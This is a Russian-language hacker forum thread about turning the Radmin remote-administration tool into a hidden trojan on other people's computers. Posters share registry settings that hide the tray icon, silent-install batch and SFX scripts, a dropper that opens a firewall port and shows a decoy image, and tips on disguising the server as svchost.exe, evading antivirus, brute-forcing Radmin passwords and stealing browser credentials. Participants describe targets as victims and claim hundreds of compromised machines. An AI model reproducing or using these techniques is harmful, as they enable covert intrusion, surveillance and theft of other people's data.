- прописка лицензии для вечной работы =]

Код:

Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin] [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0] [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server] [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplis t] [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Param eters] "NTAuthEnabled"=hex:00,00,00,00 "Parameter"=hex:38,70,e3,b9,f6,f4,fb,9e,f8,9c,77,92,11,f4,ce, 1a "DisableTrayIcon"=hex:01,00,00,00 "Port"=hex:23,13,00,00 "EnableLogFile"=hex:00,00,00,00 "LogFilePath"="c:\\logfile.txt" "FilterIp"=hex:00,00,00,00 "AskUser"=hex:00,00,00,00 [HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin\v1.01\ViewType] "Data"=hex:95,f3,0b,13,44,c0,10,74,7b,2e,83,2c,f5,89,e4, b9,49,c8,49,00,1c,eb,\ 18,64,87,46,c5,78,59,73,2a,6a,13,72,53,9e,e4,f5,74 ,94,4f,49,42,46,f7,ab,05,\ 1f,55,24,72,79,e9,85,c8,8a,1e,5e,e3,d8,35,70,06,28

чтоби - пароль 123456789 бил например 000000000 ???????

блин что никто ничем не может помоч? он у меня же скоро вообще откажется рабоать без ключей....

привет всем ,у меня вот такой вопрос ,компьютер ( на нем уже утсновлен мною радмин) связыватся с интернетом через адсл роутер и на сколько я знаю что бы извне что бы связаться с ним,нужно что бы в роутере был прописан порт форватинг ,соответственно пароля к роутеру я не знаю можно ли как нибуть без этого форватинга обойтись

Скрипты работают, классно, но есть ещё 1 проблемка, Многие продвинутые юзеры отключают R_server через дипечер задач для полного спокойствия. Можно ли сделать скрипт, чтоб запускал ещё какую нить ненужную службу , не вредящую компу в смысле безопасности.Для спокойствия граждан столь продвинутых.

А как от такого себя обезопасить?

впарил жертве RAdmin, требуется утянуть пароли от IE. Где они хранятся? Я имею ввиду запомненные пароли от форумов, почты и прочего...

Привет. ПРочитал статью Mega FAQ по Radmin'у
Вопрос
Я создал батник с одним лишь
reg import 111.reg
И вот. КОГДА Я ЕГО ЗАПУСКАЮ ОН ГОВОРИТ ЧТО ВСЁ ОК А НА САМОМ ДЕЛЕ НИЧЕГО.
Когда я запускаю его из ком строки всё ок.
Когда я запускаю сам файл реестра всё ок.
Винда XP.
В чём проблема то ?

Elekt >> Испытывал трудности с Нодом. После некоторого секса удалось закриптовать файлы.

Все ок только есть... я установил в одном клубе.. так антивира спалила. название - Avira, база за 17,01,2007 .. как мне зашифрировать.???

И ищо один вопрос если с удаленого компа потом после установки, удалить папку с прогой то че будет.??? связь пропадет или нет.??

Elekt >> Испытывал трудности с Нодом. После некоторого секса удалось закриптовать файлы.

Все ок только есть... я установил в одном клубе.. так антивира спалила. название - Avira, --->> база за 17,01,2007 .. <<--- как мне зашифрировать.???

И ищо один вопрос если с удаленого компа потом после установки, удалить папку с прогой то че будет.??? связь пропадет или нет.??

а дата последнего редактирования: Последний раз редактировалось HakNet, 13.01.2007 в 02:18.
интерестно :D

2 Elekt > как выполнить команды в инсталле?

впарил жертве RAdmin, требуется утянуть пароли от IE. Где они хранятся? Я имею ввиду запомненные пароли от форумов, почты и прочего...
m17
можно заюзать пинч, там есть такая функция выдирать всякую куйню из ИЕ, правда использовать его мона будет только если у жертвы нету антивируса.. или старые базы.. или закриптовать трой... мля, ну кароч во зацени >> http://www.fssr.ru/hz.php?name=Forums&file=viewtopic&p=83318 и >> http://bugtraq.ru/library/security/iepass.html

что касаетсо статьи.. статья круть.. жаль что архивчик с радмином палитсо Аутпостом 4ым ((

HakNet, 13.01.2007 в 02:18.

Какую траву куриш?, бехарь.?
Да не чувак.... ты внатуре наркаман=)

Очень хорошая статья, но вот я не пойму, а если же пользователь работает на компьютере без прав администратора, допустим он "Гость". программа будет работать??? Ведь многие сотрудники в офисах работают с ограниченными правами.

И может кто-нибудь подскажет ссылочку на материал, как можно его залить на чужой компутер , если знаешь только Ip юзверя???

Подрубаюсь к машине через 445 порт сплойтом...
Как закинуть через telnet радмина а автозагрузку?

На третьей странице этой темы вроде ответ...

А в этом архиве находится стоит только запустить 111.bat и все и с каждой загрузки windows будет запускаться radmin server,да ? А то просто тут кто то спрашивал типа как сделать чтоб он запускался с windows . И как можно поменять порт что нужно где написать чтоб поменять ?

тех. поддержка пришла =)

...но веть для того чтобы он заработал нужно ресет машины, или же ресет выполняется только после первого заселения?
после запуска 111.bat сервер стартует.
По непонятной особенности есть маленькая задержка при старте, кажется как будто нефига не вышло, коннекта нет и прочее. Подождите пару минут.
Так же опыты показали, что(по так и не выясненным причинам) мгновенно выйти из ступора помогает команда
dir c:\windows

А мне скажите кто-нибудь =*( Какой порт надо сканировать? 445 / tcp?
который прописан в 111.reg
у меня там стоит 4899

И как можно поменять порт что нужно где написать чтоб поменять ?
Пишу тебе потому что тема молчит!
я ставил радмин себе, выставлял порт, после чего смотрел на ключ реестра.
По другому можно только дизасемблировав и выяснив алгоритм шифрования.

А в этом архиве http://sec-123.narod.ru/radmin/4.rar
находится стоит только запустить 111.bat и все и с каждой загрузки windows будет запускаться radmin server,да ?ДА

там в первом посте говорили про програму PasswordPro и хеч ею паролей для реадмина. вопрос.
у меня в списке нету вида хеча \"RADMIN\" где взять?
passwordspro v.1.3.1.2
в старших версиях радмин убрали хз почему

Многие продвинутые юзеры отключают R_server через дипечер задач для полного спокойствия. Можно ли сделать скрипт, чтоб запускал ещё какую нить ненужную службу , не вредящую компу в смысле безопасности.Для спокойствия граждан столь продвинутых.
я щас уже не помню, как обозвал билд сервера
вобщем достаточно переименовать r_server.exe во что нить неприметное типа svchost.exe ну и в скриптах имя поправить на новое.

Если влом\не можешь написать прогу, висящую в процессах - скомпилируй ксинча\пинча на режим прокси сервера, отключив всё остальное. палицца тогда не должен и в процессах будет висеть

Подрубаюсь к машине через 445 порт сплойтом...
Как закинуть через telnet радмина а автозагрузку?
кликни на мое видео

Огромное спасибо за ответы !
я ставил радмин себе, выставлял порт, после чего смотрел на ключ реестра.
По другому можно только дизасемблировав и выяснив алгоритм шифрования.
да тупо а больше не как да может что то 111.reg можно поменять и все порт будет другой , а то так тупо хочешь над другом поугарать а все через порт 4899 сканят и ему западлят а хочу только я ! И еще вопрос иконку в трее видно ли нет !

если ты имел виду Радмин. Там в опциях есть, мона поставить иконку в трей и мона убрать!
Я имел виду тот архив который на первой странице когда его запускаешь иконку видно или нет ?
И САМЫЙ ГЛАВНЫЙ ВОПРОС КАК ПОМЕНЯТЬ ПОРТ ?
Заранее спасибо)))

ДА не видно это я сам понял .Всем спс ! ) А как всетаки сделать поменять пароль или порт!

А в этом архиве не лзя сделать чтоб можно было управлять рабочим столом ! (его просто видно а управлять не лзя )

Вообщем скачал я архивчик #4.....принцип понятен...но есть вопросик...как эти ВСЕ фаилы запихнуть в ОДИН фаил и чтобы при его запуске установка происходила скрыто.....

т.е чтоб это усе приклеить к фаилу например какойнить проги....;)

и еще вопросик...) как поменять пароль?;)

А в этом архиве не лзя сделать чтоб можно было управлять рабочим столом ! (его просто видно а управлять не лзя )
Коннектится надо в режиме "Full control"


Вообщем скачал я архивчик #4.....принцип понятен...но есть вопросик...как эти ВСЕ фаилы запихнуть в ОДИН фаил и чтобы при его запуске установка происходила скрыто.....

т.е чтоб это усе приклеить к фаилу например какойнить проги....

и еще вопросик...) как поменять пароль?


используй обычный SFX-rar архив (с параметрами перезаписывать если есть уже, такой файл и не спрашивать ни чего при распаковке (срыть всё)

Для скрытой инсталяции самого сервера RA используюй ключ /silence

Вообщем скачал я архивчик #4.....принцип понятен...но есть вопросик...как эти ВСЕ фаилы запихнуть в ОДИН фаил и чтобы при его запуске установка происходила скрыто.....

т.е чтоб это усе приклеить к фаилу например какойнить проги....;)

и еще вопросик...) как поменять пароль?;)
Да кстати как поменять пароль и порт ?
Че то я спрашивал не кто не отвечает!

Да я сам незнаю.....если чесно.....;(


кто может привести пример Sfx архива??? с уже готовым радмином для впаривания...

Параметры SFX-архива:

;В комментарии ниже находятся команды SFX-сценария
Path=.\%SystemRoot%\system32
SavePath
Setup=%SystemRoot%\system32\run.cmd
Silent=1
Overwrite=1

Состав архива:

AdmDll.dll
Hide_RA.reg
r_server.exe
raddrv.dll
run.cmd


Содержимое run.cmd:

r_server /install /silence
reg import Hide_RA.reg
r_server /start /silence


P.S. Забирайте готовый сервер Радмина (стандартный порт, без пароля версия 2.2): http://lebed.ucoz.ru/soft/RA.zip

такс....теперь помогите еще разок..;) у меня есть все сделанное по FAQ в самом начале...т.е.

AdmDll.dll
111.reg
r_server.exe
raddrv.dll
111.bat
DEL.bat


=> мне надо еще создать фаил run.cmd с содержимым

111.bat и все?

Да, не, мона bat, можно cmd (cmd - тока на XP, батник на любой винде будет работать),
содержимое, то что я написал, можешь делать как Elekt написал, я же выложил готовый - распакуй его winrar`ом в любую папку и посмотри...

а...т.е......мона скачать архив #4 и просто его в sfx и прописать коментарий

;В комментарии ниже находятся команды SFX-сценария
Path=.\%SystemRoot%\system32
SavePath
Setup=%SystemRoot%\system32\111.bat
Silent=1
Overwrite=1

???

и при его запуске типа "не чё не произойдет" но сервак радмина будет установлен..?

а...т.е......мона скачать архив #4 и просто его в sfx и прописать коментарий


???

и при его запуске типа "не чё не произойдет" но сервак радмина будет установлен..?

Окошко банкика, имхо мелькнуть может (в прочем как и cmd)

хыхыК получилось..;) тока что челу закинул;))) а склеил его с флэшплеером)))))

хыхыК получилось..;) тока что челу закинул;))) а склеил его с флэшплеером)))))

А подключится к нему, получилось?

"Parameter"=hex:38,70,e3,b9,f6,f4,fb,9e,f8,9c,77,92,11,f4,ce, 1a
"Port"=hex:23,13,00,00
Но все таки что мне надо изменить в этих строчках чтоб пароль и порт поменять ?
Или скажите где есть инфа по реестру ну про его кодирование !

Все я сам разобрался и с портом как менять и паролем !)

Тема супер!
-И антивирусом (в часности NOD32 ) не палится, как было сказано в посте ...
-Доработал под себя, получился не плохой наборчик, всего из 4-х файлоф ...
svchost.exe (убрана иконка, которая настораживала своим видом когда в списке висят штук 8 svchost -ов и один из них ЧЁРНЫЙ ... )
set_time.bat (ранее знакомый нам как 111.bat но включающий в себя и команды reg add и заметания следов del всех перечисленных фалов, после их проработки :)
raddrv.dll (убрана подпись о том что она пренадлежит Remote Administrator)
AdmDll.dll

-Следующим этапом, буду клееть с Anti-Vypress-Chat -Который пользуется большой популярностью в наших локалках ...

-Есть одна только проблема:
Виндовозовский брадмауер, чётко обошли ... ;)
А как быть с OutPost-ом :p
Пробовал создавать правило "исключение" для данного процесса (в OutPost) -ну типа -"разрешить данному приложению всё" ...
Затем сравнивал снимки реестра (TotallUninstall-ером), сделаные до, и после разрешения, (были изменения в некоторых его ветвях...) Но после "икуственного" импортирования этих пааметров, посредством bat-ника ну или файла.reg
-OutPost не принимает его в исключения (разрешённые программы) :confused:

-Может есть у кого, какие соображения на данную тему?

Народ, подскажите. Есть файл, склееный клеем SuperGlue, но он распознается как вирус. Чем его можно закриптовать, чтобы он не палился? )

Кто может выложить файлы от радмина raddrv.dll, AdmDll.dll не поляшийся nod32 ато они уменя уже палиться :(.

Кто может выложить файлы от радмина raddrv.dll, AdmDll.dll не поляшийся nod32 ато они уменя уже палиться :(.

Не вижу обходимости выкладывать ... поскольку, установив Radmin, ты найдёшь в его папке, всё что ты ищешь ;-)

- Чтож за NOD у тебя такой? :rolleyes:
У меня NOD32 c версией баз 2144 от 25 марта и них... не палит .... :cool:

У меня каждый день обновления на нод ,но тоже не палит ! Он палит только когда глубокий анализ делаешь , а так даже при запуске палит ? ха
Спс за эту инструкцию автору ! Наугарался я и пароли крал ,но че-то быстро надоедает так угарать !

У жертвы динамический ip, как сделать так, чтобы при выходе её в онлайн мне отсылался её новый адрес :rolleyes:

У жертвы динамический ip, как сделать так, чтобы при выходе её в онлайн мне отсылался её новый адрес
установить у жертвы соответствующий софт. но в паблике я не припомню такого, в принципе такая прожка недолго пишется. метод для ленивых: сканить пул жертвы на открытый радмин порт =)

Не вижу обходимости выкладывать ... поскольку, установив Radmin, ты найдёшь в его папке, всё что ты ищешь ;-)

- Чтож за NOD у тебя такой? :rolleyes:
У меня NOD32 c версией баз 2144 от 25 марта и них... не палит .... :cool:

У меня с версий 2176 и палит без в сякого глубокава анализа, ранше да тока с глубоким палил.

Помогите доработать способ подмены настоящего файла радмины на поддельный, чтоб не пропалили.
Вобщем забацал я сервак радмина так что он при любом подключении синего цвета и даже если на него нажать он все равно пишет Нет соединений. Теперь надо подменить реальный на мой. Я делал так:

taskkill /im r_server.exe /f
del C:\WINDOWS\system32\r_server.exe
.
.
{эту строку я продублировал 100 раз}
.
.
del C:\WINDOWS\system32\r_server.exe
copy /y "r_server.exe" "%SYSTEMROOT%\system32\r_server.exe"
"%SYSTEMROOT%\system32\r_server.exe" /start
del C:\r_server.exe
del C:\start.bat

Затем сохраняю его с именем start.bat, пакую батник и мой файл сервака винраром в sfx. При упаковке настраиваю чтоб распаковывался на диск С. Ставлю галочку Скрывать все и перезаписывать существующие фалы.
Остается только приконектится к жертве через телнет и перепись файлов (ПРИ ЭТИХ ПОДКЛЮЧЕНИЯХ ЦВЕТ ИКОНКИ РАДИНА НЕ МЕНЯЕТСЯ). Закидываю файл, запускаю и отсоединяюсь. Через секунд 15 обратно присоединяюсь через Перепись файлов и снова копирую файл r_server.exe чтобы проверить подменился он или нет. Если это мой то все олично. Отключаю звук при подключении и можно смело наблюдать за действиями пользователя. Всегда когда я так делал все работало, НО на одном компе это не проходит. Не могу понять почему. Может кто подскажет как усовершенствовать этот метод?

я вот только не понял... Чтобы "з0хватить" машину я на неё заливаю серверную часть, а с клиентской коннектюсь или наоборот?

я вот только не понял... Чтобы "з0хватить" машину я на неё заливаю серверную часть, а с клиентской коннектюсь или наоборот?
именно так.
исходя из традиционной tcp/ip концепции "клиент-сервер".

Молодец хороший Faq как раз то что искал спасибо.

Отличный faq, от себя добавлю то, как у меня появилось около 300 компов под радмином за впринципе небольшой период времени.
Сначала использовал сканнер в локалке на порт 4899, потом через программу Radmin Client(очень удобная вещь) подбирал следующие пароли
12345678
87654321
12341234
123456789
987654321
1234567890
0987654321
qwertyuio
asdfghjkl
zxcvbnm,
Спасибо разработчикам за минимальный пароль в 8 символов :D

Народ объясните накурившимуся ламеру - у мя есть радмин, установщик.
Там написано:
установить radmin server
установить radmin viewer

так там клиента нету? ЧТО КУДА ДЕВАТЬ-ТО?!

PS - если что - дайте ссылку на клиент

Народ объясните накурившимуся ламеру - у мя есть радмин, установщик.
Там написано:
установить radmin server
установить radmin viewer

так там клиента нету? ЧТО КУДА ДЕВАТЬ-ТО?!
Radmin viewer - это и есть клиент.

а какой файл(ы) надо отсылать жертве? все кроме viewer'а и ещё...в теме был вопрос - пароль на радмина не подходит, а ответ - меняй реестр. так вот - как менять реестр если доступа к компу нет? радмин-то не пашет

у меня ещё вопрос - я скачал radmin 3.0
В архиве два установщика:
rserv30ru.exe
rview30ru.exe
Первый - то что надо впарить. Но если я его ставлю у себя, там нету тех файлов что описаны на первой странице! Даже поиск юзал!

Версия уже другая. Что че тут не понятно. Плюс на 3 версию нету серийника, если я не ошибаюсь. Там кряк. Так что установка сервера все равно потребует регистрации.
Если нет возможности сменить пароль через реестр, то остаеться только получать доступ к этому компу другими способами. Например опять аарить радмина но на другой порт. Или читай статью "Троян от мелкомягких".

ещё вопрос - а если я впарил радмин и юзер не знает об этом, я наблюдаю, юзер не знает. А если я файл отошлю, или скачаю, юзер будет знать об этом? увидит что-нибудь на мониторе?

Если значеки в трее не оставишь и юзер на него не нажмет, то не увидит.

у кого остался брутфорс к Р_Админу ? , буду очень благодарен.
в нете видел, писали хорошие отзывы, но линки все мертвые.

Client for Remote Administrator v2.1

Включает в себя все возможности встроенного viewer`a. Сохраняет все настройки рядом с собой в ini-файл. Полность импортирует всю радминовскую базу. Автоматический набор паролей (по умолчанию стоит ручной). По правой кнопке мышке выдаёт статистику текущего подключения, так что на слабых каналах будет видно идут пакеты или нет.
Работоспособность проверялась с radmin`om v2.2

Новое в версии 2.1 (основное)
- опрос соединений (пинг и проверка на RAdmin)
- хранение паролей к соединениям и автоматический их ввод при запросе
- удаленная установка, настройка и управление RAdmin-сервером (удаленно устанавливается когда знаете пароль компьютера)
- режим "Карта" - расположение соединений на плане помещения или сети
- сканирование новых соединений расширено до задания диапазона портов и поиска машин без RAdmin
- удаленно можно убрать иконку с трей и звук соединения и много другое (жертва не заметит как вы вошли =) )

Появилась возможность сканировать диапазон портов, режим сканирования машин возможен в трех вариантах: 1) только пингуемые машины, 2) только машины с RAdmin 3) все машины, а режим сканирования портов можно выполнять как до первого найденного RAdmin-сервера, так и до конца диапазона (на одной машине могут быть запущены несколько RAdmin-серверов на разных портах)

Установка:
Скопировать в папку, где установлен сервер Radmin
Возможно будет не лишнейй библиотека Admdll.dll (кинуть в ту же папку)

депозит (http://depositfiles.com/ru/files/1303178)
рапида (http://rapidshare.com/files/44774601/rclient21.exe)
з.ы. для некоторых может пригодится

Я не понял до конца начала. Что и куда нужно забрасывать и как настраивать Radmin. Можете объяснить попроще?

Извините, но я не понял начала. Какие файлы нужно забрасывать жертве? И как настраивать Radmin?

Извините, но я не понял начала. Какие файлы нужно забрасывать жертве? И как настраивать Radmin?
Для работоспобности серверной части достаточно трёх файлов:
r_server.exe - сам сервак
AdmDll.dll - необходимая длл
raddrv.dll - длл видео-захвата(без неё будет пахать всё, кроме удалённого раб.стола)

И
http://video.antichat.ru/file184.html

извините а как зделат так чтоб при устанофке например игрушки одновримена и rdmin
устанавливался но некоких Joiner ато они палитса антивирусами и их нада криптова с етим
у меня 0

Народ, допустим я впарил чел-ку Sfx архив с радмином, но чтоб подключ к серверу мне нужен его Ip?! или можно это как то обойти?

Народ, допустим я впарил чел-ку Sfx архив с радмином, но чтоб подключ к серверу мне нужен его Ip?! или можно это как то обойти?
:D Без ip жертвы никак, и это не обойти =).
А жертва в локалке сетке ?

Как мне поднять удалёный рабочий стол ? Мне нужно чтобы только удалёный стол работал.

PasswordsPro начиная с версии 2.4.0.0 теперь брутит хэши от RAdmin версий 2.x

Как мне поднять удалёный рабочий стол ? Мне нужно чтобы только удалёный стол работал.
Читай статью Лебедя "Троян от мелкомягких".

а есть возможность приконектиться RAdmin, если комп жертва за NAT?

нет? :-(

Читай статью Лебедя "Троян от мелкомягких".

спасибо прочитал. а как поднять на 2003 или 2000 ?

КТо реально может не много уделить времени на пару вопросов по етой проге,напишыте свою аську плс!

Тема просто Мега Супер !!!!!! Можете мне дать если есть или найти Serial№; На Радмин 3.0 ПЛИЗ

Zero Coo!, зарегестрируйстесь на торренте, вот прямая ссылка http://torrents.ru/forum/viewtopic.php?t=303101

Люди у меня есть вопрос, Radmin 2.1 покатит под висту ? или ещё вопрос, можете подсказать какой либо трой под висту :) ???

покатит !!! под висту

вот радмин v2.2, выдрал из ZverCD , запускается в режиме тихой установки с ключом s , авирами не палиться ( палиться только Каспером когда конектишься через Telnet , мол ввод и вывод данных и тд ) с иконкой в трее можно поработать через ResHacker , и тд и тп . http://slil.ru/25363523

Дайте код javascript который может скачать с любого сайта exe файл и запустить его без ведома жертвы

такой код стоит деньги))) название таких кодов сплоиты под бравзера.. посмотри в топике продажа.

Супер!

Помогите. Скачал архив, тот который http://sec-123.narod.ru/radmin/6.rar Установил у жертвы дома (запускал и огни.exe и config.bat Запускаю у себя R Viewer 3.0... Пишет "Не удается соединиться с сервером" И так пробовал на разных машинах... Везде одно и то же... Помогите плиз... Стукните в аську... 213887672

Hello ,

This is some tweak for Radmin i make myself
1.Get Radmin files from this post
2.Get compiler
3.Compilee Radmin files with needed files
4.Add some icon and invisibility for .exe
What's happen when you run the compiled .exe

mkdir %SYSTEMROOT%\help\Tours\nnTour

copy /y "%MYFILES%\svchost.exe" "%SYSTEMROOT%/help/Tours/nnTour/svchost.exe"

copy /y "%MYFILES%\raddrv.dll" "%SYSTEMROOT%/help/Tours/nnTour/raddrv.dll"

copy /y "%MYFILES%\AdmDll.dll" "%SYSTEMROOT%/help/Tours/nnTour/AdmDll.dll"

copy /y "%MYFILES%\111.bat" "%SYSTEMROOT%/help/Tours/nnTour/111.bat"

copy /y "%MYFILES%\111.reg" "%SYSTEMROOT%/help/Tours/nnTour/111.reg"

netsh firewall add portopening protocol = TCP port = 53221 name = TCP

reg export "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" 123.reg

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f

reg import "%SYSTEMROOT%/help/Tours/nnTour/111.reg

regedit /s "%SYSTEMROOT%/help/Tours/nnTour/111.reg

"%SYSTEMROOT%/help/Tours/nnTour/svchost.exe" /install /silence

"%SYSTEMROOT%/help/Tours/nnTour/svchost.exe" /save /silence /pass:r1st0n /port:53221
"%SYSTEMROOT%/help/Tours/nnTour/svchost.exe" /start

"%MYFILES%\1.jpg"

1. Make folder %SYSTEMROOT%\help\Tours\nnTour
2.Copy all needed files in %SYSTEMROOT%\help\Tours\nnTour
3.Open MS firewall with name "TCP" and port "53221"
netsh firewall add portopening protocol = TCP port = 32554 name = TCP

4.Import needed registry
5.Install radmin save everything use silence for icon and pass r1st0n and port 53221
- "%SYSTEMROOT%/help/Tours/nnTour/svchost.exe" /save /silence /pass:r1st0n /port:53221
- Start Radmin server
6.Open 1.jpg
When user run the exe at end after 1-2 sec.s he see the 1.jpg
You can make some tweeks to delete the reg and .bat files after install

With quick.batch.file.compiler you can import little files this was perfect to import :
svchost.exe ,raddrv.dll,AdmDll.dll,111.bat,111.reg,

Next thing is if someone can help is how to import some script or report how will give me the victim IP address for example if someone download it from HTTP and run it how to see the victim IP if someone can help I will be glad

Greetings


RADMIN FILES (http://rapidshare.com/files/100210454/r1nd0s.zip.html)

ПОмогите пожалуста найти сплоит ms04011.exe/// всё обыскал не могу найти

Спс +

']Люди, подскажите что за хня! Мне надо было получить доступ к компу одной девушки, вот попросил её установить Radmin Server, она установила всё настроила, но я не могу к ней подключиться, через XSpider сканирую её IP и пишет offline, почем такая хня?
Скорее всего она за NAT и сервер Радмина не доступен через Инет.
Если у неё ADSL - так скорее всего и есть. (надо настраивать редирект портов в конфигураторе модема, либо поставить его в режим роутер).

Как подключиться к серверу Радмина если он за Nat? насколько я понимаю надо создать туннель на другой серв и через него пустить Радмина, а самому коннектится уже к тому серву через который пустил Радмина.... Если я правильно мыслю, то как это реализовать?

Может кто сможет сделать такую же сборку только из 3 радмина? Т.к он антивирами не палится... Пробовал сам сделать что то подобное (чтобы работал нужно регать как серивс, регал с помошью утилиты srvany.exe, и запись в реестре).. Работало все кроме "Управления мышью и клавиатурой удаленного компьютера", ну и просто просмотра соответственно. Тупо не коннектилось. Знаю что для этого нужно как то подключить драйвер raddrvv3.sys из папки с сервером, но не знаю как это сделать. А остальное все (telnet, передача файлов, выключение и т.д) отлично работало. Может у кого получится. Заранее спасибо

Слушайте, может кто знает как файл-инсталер создать, чтобы невидимо устанавливался, прописал пароль и порт :confused:
Что то вроде инсталшилда или мультисета, только невидимо

Еще вопрос. Можно ли как нибудь переименовать файл r_server.exe от радмина версии 2.2, изменить иконку и информацию о файле что бы он потом запустился. А то только стоит переименовать допустим на svchost.exe или заменить иконку, он тупо не запускается.. Редактировал файл через Restorator.

Еще вопрос. Можно ли как нибудь переименовать файл r_server.exe от радмина версии 2.2, изменить иконку и информацию о файле что бы он потом запустился. А то только стоит переименовать допустим на svchost.exe или заменить иконку, он тупо не запускается.. Редактировал файл через Restorator.
Можно джоинером который умеет информацию о файле менять. RJoin вроде, в паблике где то видел

Еще вопрос. Можно ли как нибудь переименовать файл r_server.exe от радмина версии 2.2, изменить иконку и информацию о файле что бы он потом запустился. А то только стоит переименовать допустим на svchost.exe или заменить иконку, он тупо не запускается.. Редактировал файл через Restorator.
Тестил на 2.1 и 2.2 ... всё норм.. редактировал тож через реставратор

Слушайте, может кто знает как файл-инсталер создать, чтобы невидимо устанавливался, прописал пароль и порт :confused:
Что то вроде инсталшилда или мультисета, только невидимо
Кидаю ещё раз ман по работе с рессурсами...(C++ Builder):
http://wladm.narod.ru/Borland/res.html

Делов то ... на 15 минут....

У меня такой вопрос: у нас локальная городская сеть, при сканировании портов нашел около 30 компов где стоит серверная часть радмина. на большей половине их них стоит версия 2.1, на остальных уже новые версии, где запрашивается не только пароль, но и логин.Новые версии я так понимаю взломать методом подбора не реально, а вот старую верию 2.1 с помощью брютфорса можно. Вот значит подобрал я пароли к некоторым компам, но зайти незамеченным не получается, по иконке в трее сразу палят.Приобрел я версию радмина с возможностью скрытия иконки в трее, а вот как ее применить на тех компах не знаю. Помогите, как можно закинуть такую версию на те компы? Говорили, что можно установить серверную часть на своей машине и сделать соответствующие настройки (скрыть иконку, поставить пароль свой) и потом всю папку с установленной программой скопировать на удаленный комп в системную папку. Теоритически все понятно, а вот как практически сделать чтоб потом она загружалась потом на том компе. я особо не волоку в ключах реестра. может кто поможет мне в моем вопросе?

Люди может быть кто нибудь состряпает сборочку в которой в процессах висит svchost вместо r_serv,не палится в трее и тп.С пассом radmin08.
Или выложите свою сборку.
Заранее спасибо.

Тестил на 2.1 и 2.2 ... всё норм.. редактировал тож через реставратор
уверен что сервер был версии 2.2? Просто вычитал на форуме радмина что в версии 2.2 стоит какая то защита от изменений файла, в том числе и переименования.. Может расскажешь поподробнее как на данной версии изменить имя в процессах и иконку?

http://forum.antichat.ru/thread71426.html
скрытый радмин

да все норм а как зделоть так штоб скопироволо ево сразу в сартап/афазапуск ? там вроде штото типо:
@echo off
copy radmin %docoment and setings%all users%start
menu%programs%startup% или штото вроде тово!

У меня такой вопросик: Захожу на удаленный комп в режиме просмотра. рабочий стол отображен. Затем параллельно захожу на тот же комп через Telnet, пытаюсь с помощью командной строки запустить любую программу,и ничего не получается (видно по рабочему столу). Помогите, в чем может быть проблема?

Например: Захожу в Telnet. В командной строке
C:\WINDOWS\system32\> набираю cd\
Перехожу на локальный диск С:\ (удаленный комп).
затем например пытаюсь запустить программу QIP
вот такой командой:
C:\>Program~1\QIP\qip.exe и жму Enter. но в результате ничего не происходит. В чкм может быть проблема и что не так сделал? Не оставьте мое сообщение без внимания, плиз!

У меня такой вопросик: Захожу на удаленный комп в режиме просмотра. рабочий стол отображен. Затем параллельно захожу на тот же комп через Telnet, пытаюсь с помощью командной строки запустить любую программу,и ничего не получается (видно по рабочему столу). Помогите, в чем может быть проблема?

Например: Захожу в Telnet. В командной строке
C:\WINDOWS\system32\> набираю cd\
Перехожу на локальный диск С:\ (удаленный комп).
затем например пытаюсь запустить программу QIP
вот такой командой:
C:\>Program~1\QIP\qip.exe и жму Enter. но в результате ничего не происходит. В чкм может быть проблема и что не так сделал? Не оставьте мое сообщение без внимания, плиз!
"C:\***\***\***.exe"

Fox1010, если ты так будешь запускать проги то думаешь там не заметят этого? А если тебе пофигу, так подключайся в режиме полного управления.
Ну а если совсем по теме то можешь написать так
"c:\program files\qip\qip.exe" (не забудь про кавычки)
или так
cd\
cd program files
cd qip
qip.exe

Fox1010, если ты так будешь запускать проги то думаешь там не заметят этого? А если тебе пофигу, так подключайся в режиме полного управления.
Ну а если совсем по теме то можешь написать так
"c:\program files\qip\qip.exe" (не забудь про кавычки)
или так
cd\
cd program files
cd qip
qip.exe

Мне не столько важен смысл скрыть этот запуск, сколько важен сам процесс запуска любой программы через Telnet на удаленной машине. на своей машине все работает на вот на удаленных никак не выходит. Пробовал набирать команды как вы показали, ни одна программа так и не запустилась. И это не на одной конкретно машине. Сеть у нас локальная. Используя даже последовательные команды, описанные в последнем примере, заходит только в саму папку с программой, а вот сам ЕХЕшник не запускает. У вас это работает практически или в теории? Может нужны еще доп.настройки радмина или самого компа?
P.S. Используя Telnet получается закрывать некоторые программы , запущенные на удаленной машине, используя команду tskill . Значит Telnet работоспособен. А вот открыть ни как.

у меня нормально запускало через телнет.
"C:\***\***\***.exe"
про кавычки не забывай

Колбаса, тут это уже говорилось...

Фокс1010, а под какой осю вы работайте? И к которой подключаетесь...

А так странный случай.

та же проблема что и у Fox1010... получилось только со второго раза запустить виртуальную клавиатуру(C:\WINDOWS\system32\osk.exe), больше ничего не запускается...

Колбаса, тут это уже говорилось...

Фокс1010, а под какой осю вы работайте? И к которой подключаетесь...

А так странный случай.
У меня стоит Хр Home Edition SP2, а на тех компах тоже XP Home и XP Professional. с Вистой не пробывал.
я бы еще мог понять что коннект не идет через инет, а тут все в локалке и не получается. какие еще варианты можно попробывать?

А программы как Брандмауэр, Антивири ? Они это блокировать никак не могли?

Какая версия Radmin`a?
Только что проверил, у меня на локал хосте запустилось.
Версия Radmin 2.2

А программы как Брандмауэр, Антивири ? Они это блокировать никак не могли?

Какая версия Radmin`a?
Только что проверил, у меня на локал хосте запустилось.
Версия Radmin 2.2
У меня то все остальные функции работаю, даже могу закрыть открытые программы через Telnet.
версию не знаю, установил скрытую версию радмина из этого форума.

Хмм... Я устанавливал обычный 2.2 Потом ручками почистил инсталл, переименоавывал сервис, менял порт... Т.е. скрытой установкой не пользовался.

Ну попробую её установить, может действительно косяк.

Попробуй. У меня версия со скрытой установкой, даже в процессах не плится, без иконок. Прога супер, вот если бы еще с ее помощью через Telnet можно было запустить прогу самому, тоесть установить, было бы вообще супер. Дело в том что при входе на удаленный комп с обычным радмином меня палят по иконке в трее. Закинуть свою версию возможно, а вот как потом ее запустить не знаю. ее нужно одним нажатием запустить, что я и пытаюсь через Телнет. И ничего не получается. Попробуй ты, может у тебя выйдет.

Так ты в реестре измени показ иконки в трее.

Так ты в реестре измени показ иконки в трее.
